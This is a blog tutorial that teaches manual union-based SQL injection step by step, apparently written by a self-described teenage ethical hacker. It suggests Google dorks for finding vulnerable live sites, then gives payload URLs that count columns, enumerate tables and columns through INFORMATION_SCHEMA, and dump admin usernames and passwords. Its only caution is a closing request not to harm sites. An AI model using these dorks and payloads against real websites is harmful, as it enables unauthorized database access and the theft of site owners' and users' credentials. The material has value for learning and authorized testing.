SQL injection Union Based Manually Step by Step

sql injection manually

SQL injection Union Based Manually Step by Step

Hello guys hope you were doing good in this tutorial we will discuss about basic SQL injection union based manually so first i would like to recommended you to learn the basic of SQL from w3schools. so lets me start from introduction.

What is SQL Injection ?

SQL Injection is a type of code injection vulnerability in database layer. A successfull sql injection exploit can read and modify the backend database. This vulnerability can be found when user input is incorrectly filtered for string.

What an attacker can do ?

  • An attacker can Inject in website and can read and modify database.
  • An attacker can take the control of your admin panel if you have.
  • If the targeted website is E-commerce and website store the information then attacker can easily get.
  • An attacker can shell and deface the website.

So lets start our work….

Step 1:

Find an SQL Injection vulnerable website with google dorks. Huge list of SQLI dorks click Here

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now you will have to check the vulnerability by adding single quote after id parameter and hit enter if you will get a error message like sql syntax error that means site is vulnerable to sql attack.

www.vulnerablesite.com/index.php?id=1'

Step 3:

Now after checking the vulnerability if the site is vulnerable then you will have to find the number of columns by using order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here i got the error message in order by 5 that means the total number columns are 5.

Step:4

Now we will the vulnerable column using union command

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

SQL injection manually

As you can see in the above image vulnerable column is 2 following things we will use this commands.

Version - @@version also version()
Database- database()
Current User - user()

Step 5 :

Now we will find the table name just paste this query in vulnerable column given below.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

SQL injection Union Based ManuallyStep 6:

we will find the column names of particular table just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

yeah now we got column name of table name and our next target is to dump data.

Step 7:

Now we got database,table name and column name as well so we will dump database of the targeted website. just replace column_name with the target column for example. admin, user e.t.c and add in last from targeted table.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

yeah we got the username and password.

keep practising but don’t harm any site…

 

Author: Ahmed Raza Memon

I am 17 years old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer From the India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been Acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many More...

Leave a Reply